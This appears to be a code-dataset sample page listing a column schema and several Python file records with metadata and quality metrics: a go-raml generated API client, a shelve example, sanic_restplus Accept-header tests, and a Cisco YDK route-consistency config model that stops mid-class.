| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
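
Each record below follows this schema: the file's repository metadata, its `content`, and then the quality-signal values in column order. As a minimal sketch of how rows with this schema could be loaded and filtered, assuming the split has been exported to a local Parquet file (the file name `sample.parquet` and the filter thresholds are illustrative assumptions, not part of the dataset):

```python
# A minimal sketch, assuming the rows shown below have been exported to a
# local Parquet file. "sample.parquet" and the thresholds are illustrative
# assumptions, not part of the dataset itself.
import pandas as pd

df = pd.read_parquet("sample.parquet")

# Keep Python files that are not flagged as auto-generated and whose
# word diversity is above an arbitrary example threshold.
keep = (
    (df["lang"] == "Python")
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
    & (df["qsc_code_frac_words_unique_quality_signal"] > 0.2)
)
print(df.loc[keep, ["max_stars_repo_name", "max_stars_repo_path", "size"]])
```
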
hexsha: 218490b320be760e2cca027e0537fd5f2c5a847d | size: 2,540 | ext: py | lang: Python
max_stars: codegen/python/fixtures/method/client/complex_body/requests_unmarshall/arrays_service.py @ feeltheajf/go-raml (57ce1f4c47bca464efee03cb4a7a28efcd00bea2), licenses ["BSD-2-Clause"], count null, events null → null
max_issues: codegen/python/fixtures/method/client/complex_body/requests_unmarshall/arrays_service.py @ feeltheajf/go-raml (57ce1f4c47bca464efee03cb4a7a28efcd00bea2), licenses ["BSD-2-Clause"], count null, events null → null
max_forks: codegen/python/fixtures/method/client/complex_body/requests_unmarshall/arrays_service.py @ feeltheajf/go-raml (57ce1f4c47bca464efee03cb4a7a28efcd00bea2), licenses ["BSD-2-Clause"], count null, events null → null
content:
# DO NOT EDIT THIS FILE. This file will be overwritten when re-running go-raml.
from .Animal import Animal
from .unhandled_api_error import UnhandledAPIError
from .unmarshall_error import UnmarshallError
class ArraysService:
"""
auto-generated. don't touch.
"""
@staticmethod
def _get_methods():
return (("arrays_post", "Animal"), ("arrays_put", "Animal"))
def __init__(self, client):
self.client = client
def arrays_post(
self,
data,
headers=None,
query_params=None,
content_type="application/json",
):
"""
handle array
It is method for POST /arrays
"""
if query_params is None:
query_params = {}
uri = self.client.base_url + "/arrays"
resp = self.client.post(uri, data, headers, query_params, content_type)
try:
if resp.status_code == 201:
resps = []
for elem in resp.json():
resps.append(Animal(elem))
return resps, resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(
response=resp, code=resp.status_code, message=message
)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
def arrays_put(
self,
data,
headers=None,
query_params=None,
content_type="application/json",
):
"""
another form of array
It is method for PUT /arrays
"""
if query_params is None:
query_params = {}
uri = self.client.base_url + "/arrays"
resp = self.client.put(uri, data, headers, query_params, content_type)
try:
if resp.status_code == 200:
resps = []
for elem in resp.json():
resps.append(Animal(elem))
return resps, resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(
response=resp, code=resp.status_code, message=message
)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
| 29.534884
| 79
| 0.559449
| 269
| 2,540
| 5.159851
| 0.312268
| 0.063401
| 0.060519
| 0.027378
| 0.736311
| 0.710375
| 0.710375
| 0.710375
| 0.710375
| 0.710375
| 0
| 0.003656
| 0.353937
| 2,540
| 85
| 80
| 29.882353
| 0.842169
| 0.079134
| 0
| 0.730159
| 1
| 0
| 0.054401
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063492
| false
| 0
| 0.047619
| 0.015873
| 0.174603
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
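
The row above is a go-raml-generated client (its content begins with "DO NOT EDIT THIS FILE"), and its `qsc_code_cate_autogen_quality_signal` is 1. A hedged sketch of the kind of header-marker heuristic such a flag could be based on; the marker list and the 10-line window are assumptions, not the dataset's actual rule:

```python
import re

# Illustrative markers only; the real rule behind qsc_code_cate_autogen
# is not documented in this sample.
AUTOGEN_MARKERS = [r"do not edit", r"auto-?generated", r"generated by"]

def looks_autogenerated(source: str, head_lines: int = 10) -> bool:
    """Return True if an auto-generation marker appears near the top of the file."""
    head = "\n".join(source.splitlines()[:head_lines]).lower()
    return any(re.search(pattern, head) for pattern in AUTOGEN_MARKERS)
```
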
hexsha: df803eab0a65180054edee43656e390d645a1664 | size: 70 | ext: py | lang: Python
max_stars: molsysmt/tools/file_xyznpy/__init__.py @ dprada/molsysmt (83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d), licenses ["MIT"], count null, events null → null
max_issues: molsysmt/tools/file_xyznpy/__init__.py @ dprada/molsysmt (83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d), licenses ["MIT"], count null, events null → null
max_forks: molsysmt/tools/file_xyznpy/__init__.py @ dprada/molsysmt (83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d), licenses ["MIT"], count null, events null → null
content:
from .is_file_xyznpy import is_file_xyznpy
from .to_XYZ import to_XYZ
| 23.333333
| 42
| 0.857143
| 14
| 70
| 3.857143
| 0.5
| 0.222222
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 70
| 2
| 43
| 35
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
hexsha: 10e36486204e56af6aae56d57ccbad8d58676b51 | size: 444 | ext: py | lang: Python
max_stars: Chapter06/io_05.py @ vabyte/Modern-Python-Standard-Library-Cookbook (4f53e3ab7b61aca1cca9343e7421e170280cd5b5), licenses ["MIT"], count 84, events 2018-08-09T09:30:03.000Z → 2022-01-04T23:20:38.000Z
max_issues: Chapter06/io_05.py @ jiro74/Modern-Python-Standard-Library-Cookbook (4f53e3ab7b61aca1cca9343e7421e170280cd5b5), licenses ["MIT"], count 1, events 2019-11-04T18:57:40.000Z → 2020-09-07T08:52:25.000Z
max_forks: Chapter06/io_05.py @ jiro74/Modern-Python-Standard-Library-Cookbook (4f53e3ab7b61aca1cca9343e7421e170280cd5b5), licenses ["MIT"], count 33, events 2018-09-26T11:05:55.000Z → 2022-03-15T10:31:10.000Z
content:
import shelve
with shelve.open('/tmp/shelf.db') as shelf:
shelf['value'] = 5
with shelve.open('/tmp/shelf.db') as shelf:
print(shelf['value'])
class MyClass(object):
def __init__(self, value):
self.value = value
with shelve.open('/tmp/shelf.db') as shelf:
shelf['value'] = MyClass(5)
with shelve.open('/tmp/shelf.db') as shelf:
print(shelf['value'])
with shelve.open('/tmp/shelf.db') as shelf:
print(shelf['value'].value)
| 21.142857
| 43
| 0.671171
| 69
| 444
| 4.26087
| 0.246377
| 0.170068
| 0.238095
| 0.289116
| 0.772109
| 0.772109
| 0.772109
| 0.772109
| 0.772109
| 0.755102
| 0
| 0.005222
| 0.137387
| 444
| 20
| 44
| 22.2
| 0.762402
| 0
| 0
| 0.5
| 0
| 0
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.214286
| 0.214286
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
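
The `Chapter06/io_05.py` row above repeats near-identical `with shelve.open('/tmp/shelf.db') as shelf:` blocks, and its `qsc_code_frac_chars_dupe_5grams_quality_signal` is about 0.77. A rough sketch of how a duplicated-n-gram character fraction can be estimated over word 5-grams; this is an approximation for illustration, not the dataset's exact definition:

```python
from collections import Counter

def frac_chars_dupe_ngrams(text: str, n: int = 5) -> float:
    """Approximate fraction of n-gram characters that belong to repeated word n-grams."""
    words = text.split()
    if len(words) < n:
        return 0.0
    ngrams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    counts = Counter(ngrams)

    def gram_chars(gram):
        return sum(len(word) for word in gram)

    dupe = sum(gram_chars(g) for g in ngrams if counts[g] > 1)
    total = sum(gram_chars(g) for g in ngrams)
    return dupe / total if total else 0.0
```
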
hexsha: 10ea855b92b87fc8d0d8c2c13cfaebe624b62749 | size: 5,883 | ext: py | lang: Python
max_stars: tests/test_accept.py @ alex-ip/sanic-restplus (6f07af56b96eb9039622ecfe592a730e6e7e9d90), licenses ["MIT"], count 115, events 2017-04-04T22:30:45.000Z → 2022-03-28T01:52:48.000Z
max_issues: tests/test_accept.py @ alex-ip/sanic-restplus (6f07af56b96eb9039622ecfe592a730e6e7e9d90), licenses ["MIT"], count 24, events 2017-06-09T01:03:49.000Z → 2021-08-31T01:45:41.000Z
max_forks: tests/test_accept.py @ alex-ip/sanic-restplus (6f07af56b96eb9039622ecfe592a730e6e7e9d90), licenses ["MIT"], count 21, events 2017-04-22T19:41:11.000Z → 2022-03-02T04:00:02.000Z
content:
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sanic_restplus
from sanic_restplus import restplus
from sanic.response import HTTPResponse
class Foo(sanic_restplus.Resource):
async def get(self, request):
return "data", 200
class ErrorsTest(object):
async def test_accept_default_application_json(self, app, client):
api = sanic_restplus.Api(app)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers={'Accept': ''})
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_application_json_by_default(self, app, client):
api = sanic_restplus.Api(app)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_no_default_match_acceptable(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_default_override_accept(self, app, client):
api = sanic_restplus.Api(app)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_default_any_pick_first(self, app, client):
api = sanic_restplus.Api(app)
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', '*/*')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_no_default_no_match_not_acceptable(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 406
assert res.content_type == 'application/json'
async def test_accept_no_default_custom_repr_match(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 200
assert res.content_type == 'text/plain'
async def test_accept_no_default_custom_repr_not_acceptable(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status == 406
assert res.content_type == 'text/plain'
async def test_accept_no_default_match_q0_not_acceptable(self, app, client):
"""
q=0 should be considered NotAcceptable,
"""
api = sanic_restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json; q=0')])
assert res.status == 406
async def test_accept_no_default_accept_highest_quality_of_two(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=1.0')])
assert res.status == 200
assert res.content_type == 'text/plain'
async def test_accept_no_default_accept_highest_quality_of_three(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
@api.representation('text/html')
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=0.3, text/html; q=0.2')])
assert res.status == 200
assert res.content_type == 'text/plain'
async def test_accept_no_default_no_representations(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.representations = {}
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 406
assert res.content_type == 'text/plain'
async def test_accept_invalid_default_no_representations(self, app, client):
api = sanic_restplus.Api(app, default_mediatype='nonexistant/mediatype')
api.representations = {}
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 500
| 38.201299
| 126
| 0.643719
| 730
| 5,883
| 4.989041
| 0.112329
| 0.059308
| 0.042834
| 0.06425
| 0.891269
| 0.877265
| 0.877265
| 0.864909
| 0.859418
| 0.848984
| 0
| 0.01224
| 0.222336
| 5,883
| 153
| 127
| 38.45098
| 0.783825
| 0.00357
| 0
| 0.724771
| 0
| 0.009174
| 0.118682
| 0.003623
| 0
| 0
| 0
| 0
| 0.220183
| 1
| 0.045872
| false
| 0
| 0.036697
| 0
| 0.155963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
hexsha: 8023d67808d5bb3156950deb9fb8d995de91f589 | size: 18,918 | ext: py | lang: Python
max_stars: cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_rt_check_cfg.py @ CiscoDevNet/ydk-py (073731fea50694d0bc6cd8ebf10fec308dcc0aa9), licenses ["ECL-2.0", "Apache-2.0"], count 177, events 2016-03-15T17:03:51.000Z → 2022-03-18T16:48:44.000Z
max_issues: cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_rt_check_cfg.py @ CiscoDevNet/ydk-py (073731fea50694d0bc6cd8ebf10fec308dcc0aa9), licenses ["ECL-2.0", "Apache-2.0"], count 18, events 2016-03-30T10:45:22.000Z → 2020-07-14T16:28:13.000Z
max_forks: cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_rt_check_cfg.py @ CiscoDevNet/ydk-py (073731fea50694d0bc6cd8ebf10fec308dcc0aa9), licenses ["ECL-2.0", "Apache-2.0"], count 85, events 2016-03-16T20:38:57.000Z → 2022-02-22T04:26:02.000Z
content:
""" Cisco_IOS_XR_infra_rt_check_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR infra\-rt\-check package configuration.
This module contains definitions
for the following management objects\:
rcc\: RCC (Route Consistency Checker) configuration
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Rcc(_Entity_):
"""
RCC (Route Consistency Checker) configuration
.. attribute:: ipv6
RCC/LCC configuration for IPv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6>`
.. attribute:: ipv4
RCC/LCC configuration for IPv4
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc, self).__init__()
self._top_entity = None
self.yang_name = "rcc"
self.yang_parent_name = "Cisco-IOS-XR-infra-rt-check-cfg"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ipv6", ("ipv6", Rcc.Ipv6)), ("ipv4", ("ipv4", Rcc.Ipv4))])
self._leafs = OrderedDict()
self.ipv6 = Rcc.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self.ipv4 = Rcc.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self._segment_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc, [], name, value)
class Ipv6(_Entity_):
"""
RCC/LCC configuration for IPv6
.. attribute:: lcc
IPv4/IPv6 LCC (Label Consistency Checker) configuration
**type**\: :py:class:`Lcc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6.Lcc>`
.. attribute:: unicast
RCC configuration for unicast
**type**\: :py:class:`Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6.Unicast>`
.. attribute:: multicast
RCC configuration for multicast
**type**\: :py:class:`Multicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6.Multicast>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "rcc"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("lcc", ("lcc", Rcc.Ipv6.Lcc)), ("unicast", ("unicast", Rcc.Ipv6.Unicast)), ("multicast", ("multicast", Rcc.Ipv6.Multicast))])
self._leafs = OrderedDict()
self.lcc = Rcc.Ipv6.Lcc()
self.lcc.parent = self
self._children_name_map["lcc"] = "lcc"
self.unicast = Rcc.Ipv6.Unicast()
self.unicast.parent = self
self._children_name_map["unicast"] = "unicast"
self.multicast = Rcc.Ipv6.Multicast()
self.multicast.parent = self
self._children_name_map["multicast"] = "multicast"
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6, [], name, value)
class Lcc(_Entity_):
"""
IPv4/IPv6 LCC (Label Consistency Checker)
configuration
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6.Lcc, self).__init__()
self.yang_name = "lcc"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "lcc"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6.Lcc, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6.Lcc']['meta_info']
class Unicast(_Entity_):
"""
RCC configuration for unicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6.Unicast, self).__init__()
self.yang_name = "unicast"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "unicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6.Unicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6.Unicast']['meta_info']
class Multicast(_Entity_):
"""
RCC configuration for multicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6.Multicast, self).__init__()
self.yang_name = "multicast"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "multicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6.Multicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6.Multicast']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6']['meta_info']
class Ipv4(_Entity_):
"""
RCC/LCC configuration for IPv4
.. attribute:: lcc
IPv4/IPv6 LCC (Label Consistency Checker) configuration
**type**\: :py:class:`Lcc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4.Lcc>`
.. attribute:: unicast
RCC configuration for unicast
**type**\: :py:class:`Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4.Unicast>`
.. attribute:: multicast
RCC configuration for multicast
**type**\: :py:class:`Multicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4.Multicast>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "rcc"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("lcc", ("lcc", Rcc.Ipv4.Lcc)), ("unicast", ("unicast", Rcc.Ipv4.Unicast)), ("multicast", ("multicast", Rcc.Ipv4.Multicast))])
self._leafs = OrderedDict()
self.lcc = Rcc.Ipv4.Lcc()
self.lcc.parent = self
self._children_name_map["lcc"] = "lcc"
self.unicast = Rcc.Ipv4.Unicast()
self.unicast.parent = self
self._children_name_map["unicast"] = "unicast"
